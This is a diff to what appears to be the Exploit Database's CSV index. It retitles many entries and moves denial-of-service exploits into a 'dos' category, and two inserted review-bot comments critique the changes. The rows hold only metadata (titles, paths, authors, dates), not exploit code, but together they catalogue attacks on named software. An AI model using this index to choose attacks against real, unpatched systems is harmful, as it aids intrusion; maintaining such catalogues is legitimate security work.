 9873,platforms/windows/webapps/9873.txt,"Cherokee <= 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0
-9874,platforms/windows/webapps/9874.txt,"Cherokee Web server 0.5.4 DoS",2009-10-26,"Usman Saeed",windows,webapps,0
+9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - DoS",2009-10-26,"Usman Saeed",windows,dos,0
 9875,platforms/php/webapps/9875.txt,"CubeCart 4 Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0
 9876,platforms/php/webapps/9876.txt,"DedeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps,0
 9877,platforms/asp/webapps/9877.txt,"DWebPro command injection",2009-10-17,"Rafael Sousa",asp,webapps,0
@@ -9354,13 +9354,13 @@ id,file,description,date,author,platform,type,port
 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF",2009-11-16,"Alexey Sintsov",hardware,webapps,80
 9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server <= 4.4.17 & <= 5.0.65 - XSS",2009-10-23,"Davide Canali",php,webapps,0
 9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 file disclosure",2009-10-22,"Janek Vind",php,webapps,0
-9980,platforms/hardware/webapps/9980.txt,"Websense Email Security DoS",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0
+9980,platforms/hardware/dos/9980.txt,"Websense Email Security - DoS",2009-10-20,"Nikolas Sotiriu",hardware,dos,0
 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security xss",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0
 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer Overflow",2009-10-16,"Dragon Rider",windows,local,0
 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0
 9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0
 14273,platforms/linux/local/14273.sh,"Ubuntu PAM MOTD File Tampering (Privilege Escalation)",2010-07-08,"Kristian Erik Hermansen",linux,local,0
-9987,platforms/multiple/remote/9987.txt,"ZoIPer Call-Info DoS",2009-10-14,"Tomer Bitton",multiple,remote,5060
+9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060
 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote Vulnerability",2009-11-09,"Felipe Andres Manzano",multiple,local,0
 9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0
@@ -9393,7 +9393,7 @@ id,file,description,date,author,platform,type,port
 10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
 10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
 10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
-10022,platforms/linux/local/10022.c,"Linux Kernel - 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,local,0
+10022,platforms/linux/dos/10022.c,"Linux Kernel - 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,dos,0
 10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525
 10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0
 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143
@@ -9438,7 +9438,7 @@ id,file,description,date,author,platform,type,port
 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer Overflow Exploit",2009-10-05,bruiser,windows,remote,0
 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0
 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0
-10073,platforms/windows/remote/10073.py,"XM Easy Personal FTP 5.8 DoS",2009-10-02,PLATEN,windows,remote,21
+10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - DoS",2009-10-02,PLATEN,windows,dos,21
 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030
 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - XSS",2009-09-23,"Francis Provencher",novell,webapps,8030
 10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local kernel Root Exploit",2009-10-02,mu-b,osx,local,0
@@ -9453,7 +9453,7 @@ id,file,description,date,author,platform,type,port
 33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
 10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0
 10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0
-10083,platforms/php/remote/10083.txt,"PHP <=5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0
+10083,platforms/php/remote/10083.txt,"PHP <= 5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0
 10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation Vulnerability",2009-10-13,"Maxim A. Kulakov",windows,local,0
 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0
 10086,platforms/multiple/remote/10086.txt,"WebKit 'Document()' Function Remote Information Disclosure Vulnerability",2009-11-12,"Chris Evans",multiple,remote,0
@@ -9543,8 +9543,8 @@ id,file,description,date,author,platform,type,port
 10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - Remote SQL Injection Vulnerability",2009-11-28,kaMtiEz,php,webapps,0
 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0
 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability",2009-11-28,DigitALL,php,webapps,0
-10242,platforms/php/webapps/10242.txt,"PHP _multipart/form-data_ Denial of Service Exploit (Python)",2009-11-27,Eren,php,webapps,0
-10243,platforms/php/webapps/10243.txt,"PHP MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,webapps,0
+10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - _multipart/form-data_ Denial of Service Exploit (Python)",2009-11-27,Eren,php,dos,0
+10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,dos,0
 10244,platforms/windows/local/10244.txt,"MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0
 10245,platforms/php/webapps/10245.txt,"phpBazar <= 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0
 10246,platforms/php/webapps/10246.txt,"SweetRice <= 0.5.3 - Remote File Include Vulnerability",2009-11-29,"cr4wl3r ",php,webapps,0
@@ -9613,7 +9613,7 @@ id,file,description,date,author,platform,type,port
 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0
 10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0
 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0
-10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0
+10327,platforms/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,dos,0
 10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0
 10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection Vulnerability",2009-12-06,SadHaCkEr,php,webapps,0
 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal Vulnerability",2009-12-06,mr_me,windows,webapps,0
@@ -10169,7 +10169,7 @@ id,file,description,date,author,platform,type,port
 11048,platforms/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 ladder.php SQL Injection Vulnerability",2010-01-07,Sora,php,webapps,0
 11051,platforms/php/webapps/11051.txt,"AutoIndex PHP Script (index.php) Directory Traversal Vulnerability",2010-01-07,Red-D3v1L,php,webapps,0
 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service PoC",2010-01-07,anonymous,windows,dos,0
-11053,platforms/windows/dos/11053.py,"ttplayer=5.6Beta3 DoS PoC",2010-01-07,"t-bag YDteam",windows,dos,0
+11053,platforms/windows/dos/11053.py,"ttplayer 5.6Beta3 - DoS PoC",2010-01-07,"t-bag YDteam",windows,dos,0
 11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Shell Upload Vulnerability",2010-01-07,Yozgat.Us,php,webapps,0
 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0
 11060,platforms/php/webapps/11060.txt,"Drupal <= 6.15 - Multiple Permanent XSS (0day)",2010-01-07,emgent,php,webapps,80
@@ -10441,7 +10441,7 @@ id,file,description,date,author,platform,type,port
 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - XSS Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0
 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 - XSS Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0
 11396,platforms/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0
-11397,platforms/php/webapps/11397.txt,"PHP Captcha Security Images DoS Vulnerability",2010-02-11,"cp77fk4r ",php,webapps,0
+11397,platforms/php/dos/11397.txt,"PHP Captcha Security Images - DoS Vulnerability",2010-02-11,"cp77fk4r ",php,dos,0
 11398,platforms/php/webapps/11398.txt,"GameRoom Script Admin Bypass and File Upload Vulnerability",2010-02-11,JIKO,php,webapps,0
 11399,platforms/php/webapps/11399.txt,"myPHP Guestbook <= 2.0.4 Database Backup Dump Vulnerability",2010-02-11,"ViRuSMaN ",php,webapps,0
 11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0
@@ -11133,7 +11133,7 @@ id,file,description,date,author,platform,type,port
 12183,platforms/php/webapps/12183.txt,"Joomla Component com_jdrugstopics SQL Injection Vulnerability",2010-04-12,SadHaCkEr,php,webapps,0
 12184,platforms/php/webapps/12184.txt,"Joomla Component com_sermonspeaker SQL Injection Vulnerability",2010-04-12,SadHaCkEr,php,webapps,0
 12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent Local File Vulnerability",2010-04-12,eidelweiss,php,webapps,0
-12186,platforms/php/webapps/12186.pl,"vBulletin DoS - All Version",2010-04-12,"Jim Salim",php,webapps,0
+12186,platforms/php/dos/12186.pl,"vBulletin - DoS All Version",2010-04-12,"Jim Salim",php,dos,0
 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,"cr4wl3r ",php,webapps,0
 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string Vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0
 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
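Review bot: The rewritten description for 12186, `"vBulletin - DoS All Version"`, reads worse than the original `"vBulletin DoS - All Version"` because the separator now splits the product from the vulnerability class while the version qualifier is left dangling after "DoS". Every other retitled row in this diff uses the `<product> <version> - <issue>` pattern, so a wording that fits it, such as `"vBulletin - DoS (All Versions)"`, would keep the index consistent.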
@@ -11434,7 +11434,7 @@ id,file,description,date,author,platform,type,port
 12524,platforms/windows/dos/12524.py,"Windows SMB2 Negotiate Protocol (0x72) Response DoS",2010-05-07,"Jelmer de Hen",windows,dos,0
 12525,platforms/php/webapps/12525.txt,"PHP-Nuke 'friend.php' Module Remote SQL Injection",2010-05-07,CMD,php,webapps,0
 12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability",2010-05-07,Ra3cH,asp,webapps,0
-12527,platforms/asp/webapps/12527.txt,"Administrador de Contenidos Admin Login Bypass Vulnerability",2010-05-07,Ra3cH,asp,webapps,0
+12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass Vulnerability",2010-05-07,Ra3cH,asp,dos,0
 12528,platforms/windows/local/12528.pl,"AVCON H323Call Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0
 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0
 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow DoS (Meta)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
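Review bot: Entry 12527 is moved from `platforms/asp/webapps/` to `platforms/asp/dos/` with its type set to `dos`, but its own description, "Administrador de Contenidos - Admin Login Bypass Vulnerability", names an authentication bypass, not a denial of service. Every other row reclassified in this diff carries "DoS" or "Denial of Service" in its title, so this one looks like it was swept up by mistake; unless the underlying advisory describes a DoS, the row should keep `platforms/asp/webapps/12527.txt` and `webapps`, with only the description change retained: `12527,platforms/asp/webapps/12527.txt,"Administrador de Contenidos - Admin Login Bypass Vulnerability",2010-05-07,Ra3cH,asp,webapps,0`.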
@@ -11708,7 +11708,7 @@ id,file,description,date,author,platform,type,port
 12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) Local File Inclusion Vulnerability",2010-06-02,AntiSecurity,php,webapps,0
 12849,platforms/php/webapps/12849.txt,"slogan design Script SQL Injection Vulnerability",2010-06-03,Mr.P3rfekT,php,webapps,0
 12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP SQL Injection Vulnerability",2010-06-03,v4lc0m87,php,webapps,0
-12852,platforms/windows/webapps/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,webapps,0
+12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,dos,0
 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0
 12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - RFI Vulnerability",2010-06-03,Sid3^effects,php,webapps,0
 12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0
@@ -15655,7 +15655,7 @@ id,file,description,date,author,platform,type,port
 18020,platforms/php/webapps/18020.txt,"jara 1.6 - SQL Injection Vulnerability",2011-10-23,muuratsalo,php,webapps,0
 18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0
 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0
-18023,platforms/php/webapps/18023.java,"phpLDAPadmin 0.9.4b DoS",2011-10-23,Alguien,php,webapps,0
+18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - DoS",2011-10-23,Alguien,php,dos,0
 18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference Vulnerability PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
 18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0
 18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component SQL Injection Vulnerability",2011-10-28,"Chris Russell",php,webapps,0
@@ -16477,7 +16477,7 @@ id,file,description,date,author,platform,type,port
 19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B named SIGINT and SIGIOT symlink Vulnerability",1998-04-10,"Joe H",linux,local,0
 19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - netconfig temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0
 19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - pkgtool temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0
-19075,platforms/linux/remote/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service Vulnerability",1998-04-10,Schlossnagle,linux,remote,0
+19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service Vulnerability",1998-04-10,Schlossnagle,linux,dos,0
 19076,platforms/linux/remote/19076.txt,"Apple Personal Web Sharing 1.1 Vulnerability",1998-04-10,"Netstat Webmaster",linux,remote,0
 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow Vulnerability (1)",1998-05-05,jamez,linux,local,0
 19078,platforms/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow Vulnerability (2)",1998-05-05,pr10n,linux,local,0
@@ -16600,7 +16600,7 @@ id,file,description,date,author,platform,type,port
 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability",1999-05-17,"David Litchfield",windows,local,0
 19210,platforms/irix/local/19210.txt,"SGI IRIX <= 6.5.4 midikeys Root Vulnerability",1999-05-19,"W. Cashdollar",irix,local,0
 19211,platforms/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability",1999-05-20,"David Litchfield",windows,local,0
-19212,platforms/multiple/remote/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,remote,0
+19212,platforms/multiple/dos/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,dos,0
 19213,platforms/aix/local/19213.sh,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0
 19214,platforms/aix/local/19214.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (2)",1999-05-22,"Georgi Guninski",aix,local,0
 19215,platforms/aix/local/19215.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (3)",1999-05-22,UNYUN,aix,local,0
@@ -16618,7 +16618,7 @@ id,file,description,date,author,platform,type,port
 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 Vulnerability",1999-05-10,"Thomas Krug",windows,local,0
 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0_Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability",1999-05-25,"J. Abreu Junior",multiple,dos,0
 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0
-19230,platforms/multiple/remote/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service Vulnerability",1999-05-11,"Chris Radigan",multiple,remote,0
+19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service Vulnerability",1999-05-11,"Chris Radigan",multiple,dos,0
 19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,metasploit,windows,remote,0
 19232,platforms/solaris/local/19232.txt,"SunOS <= 4.1.4 arp(8c) Memory Dump Vulnerability",1994-02-01,anonymous,solaris,local,0
 19233,platforms/solaris/local/19233.txt,"Solaris <= 7.0 aspppd Insecure Temporary File Creation Vulnerability",1996-12-20,Al-Herbish,solaris,local,0
@@ -16626,7 +16626,7 @@ id,file,description,date,author,platform,type,port
 19235,platforms/solaris/local/19235.txt,"Solaris <= 7.0 chkperm Vulnerability",1996-12-05,"Kevin L Prigge",solaris,local,0
 19236,platforms/solaris/remote/19236.txt,"Solaris <= 7.0 Coredump Vulnerbility",1996-08-03,"Jungseok Roh",solaris,remote,0
 19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 SPAM Relay Vulnerability",1999-06-08,Geo,aix,remote,0
-19238,platforms/windows/remote/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,remote,0
+19238,platforms/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,dos,0
 19239,platforms/windows/remote/19239.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability",1999-06-04,"Scott Danahy",windows,remote,0
 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation Vulnerability",1999-06-09,"Brian Mitchell",linux,local,0
 19241,platforms/linux/remote/19241.c,"Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Vulnerability",1999-06-01,"Piotr Wilkin",linux,remote,0
@@ -16670,7 +16670,7 @@ id,file,description,date,author,platform,type,port
 19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console Vulnerability",1996-02-02,"David J Meltzer",linux,local,0
 19280,platforms/irix/local/19280.txt,"SGI IRIX <= 6.2 fsdump Vulnerability",1996-12-03,"Jaechul Choe",irix,local,0
 19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview Vulnerability",1999-05-28,"Chris Evans",linux,local,0
-19282,platforms/linux/remote/19282.c,"Linux kernel 2.0 Sendmail Denial of Service Vulnerability",1999-05-28,"Michal Zalewski",linux,remote,0
+19282,platforms/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service Vulnerability",1999-05-28,"Michal Zalewski",linux,dos,0
 19283,platforms/linux/local/19283.c,"Slackware Linux 3.1 - Buffer Overflow Vulnerability",1997-03-04,Solar,linux,local,0
 19284,platforms/linux/local/19284.c,"Armidale Software Yapp Conferencing System 2.2 - Buffer Overflow Vulnerability",1998-01-20,satan,linux,local,0
 19285,platforms/linux/local/19285.txt,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow Vulnerability (1)",1997-05-27,zgv,linux,local,0
@@ -16807,7 +16807,7 @@ id,file,description,date,author,platform,type,port
 19438,platforms/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 Weak Password Encryption Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0
 19439,platforms/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 Emergency Password Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0
 19440,platforms/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability",1999-07-30,"David Litchfield",windows,local,0
-19441,platforms/hardware/remote/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack",1999-07-30,"Mike Frantzen",hardware,remote,0
+19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack",1999-07-30,"Mike Frantzen",hardware,dos,0
 19442,platforms/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp Vulnerability",1998-11-28,"Frank Farance",windows,remote,0
 19443,platforms/multiple/remote/19443.txt,"Netscape Enterprise Server 3.51/3.6 JHTML View Source Vulnerability",1999-07-30,"David Litchfield",multiple,remote,0
 19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 Vulnerability",1999-08-05,"Stefan Lauda",hardware,remote,0
@@ -16828,7 +16828,7 @@ id,file,description,date,author,platform,type,port
 19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0
 19461,platforms/multiple/local/19461.c,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (2)",1999-08-16,"Gilles PARC",multiple,local,0
 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability",1999-08-16,"Jeremy Kothe",windows,local,0
-19463,platforms/linux/remote/19463.c,"S.u.S.E. Linux <= 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,remote,0
+19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux <= 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,dos,0
 19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0
 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0
 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0
@@ -16853,7 +16853,7 @@ id,file,description,date,author,platform,type,port
 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0
 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow Vulnerability",1999-09-02,"R00t Zer0",windows,remote,0
 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX _Eyedog_ Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0
-19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0_NetBSD <= 1.4.2_OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0
+19488,platforms/bsd/dos/19488.c,"FreeBSD <= 5.0_NetBSD <= 1.4.2_OpenBSD <= 2.7 setsockopt() - DoS",1999-09-05,"L. Sassaman",bsd,dos,0
 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 DCOM Server Vulnerability",1999-09-08,Mnemonix,windows,dos,0
 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0
 19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 HackerShield AgentAdmin Password Vulnerability",1999-09-10,anonymous,windows,remote,0
@@ -16870,7 +16870,7 @@ id,file,description,date,author,platform,type,port
 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0
 19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0
-19505,platforms/freebsd/local/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,local,0
+19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,dos,0
